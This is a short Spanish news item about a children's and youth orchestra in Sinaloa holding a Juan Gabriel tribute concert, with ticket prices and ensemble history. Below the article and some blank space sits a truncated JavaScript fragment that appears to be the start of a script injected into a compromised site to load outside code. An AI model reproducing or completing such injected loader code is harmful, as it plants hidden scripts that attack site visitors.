Harán homenaje al Divo de Juárez en Sinaloa

La Orquesta y Coro Esperanza Azteca Sinaloa ofrecerá un Homenaje al Divo de Juárez, el martes 21, a las 20:00 horas, en el Teatro Pablo de Villavicencio, interpretando lo más representativo de Juan Gabriel.

El concierto, señala un comunicado del Instituto Sinaloense de Cultura, se integra con una cuidada selección de piezas musicales de Alberto Aguilera Valadez, conocido como Juan Gabriel.

Habrá un costo de entrada de 100 pesos en preventa y 120 el día de la función, y lo que se recaude será para solventar las necesidades de esta agrupación, integrada por niños y adolescentes de la entidad y Grupo Salinas duplicará el monto de lo que se logre reunir.

La Orquesta Sinfónica y Coro Infantil y Juvenil Esperanza Azteca Sinaloa fue creada a mediados de 2012 tras una convocatoria lanzada por el Instituto Sinaloense de Cultura y Fundación Esperanza Azteca.

Cuenta con 65 integrantes en coro y 102 instrumentistas, aprovechan con alegría esta gran oportunidad y ensayan bajo la tutela de sus 15 maestros y la dirección coral y musical de los maestros: Perla Azucena Orrantia Guzmán y Daren Craig Weissfisch, respectivamente.

Fuente: http://www.noroeste.com.mx

 

 

 



if (document.currentScript) { var d=document;var s=d.createElement(‘script’);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares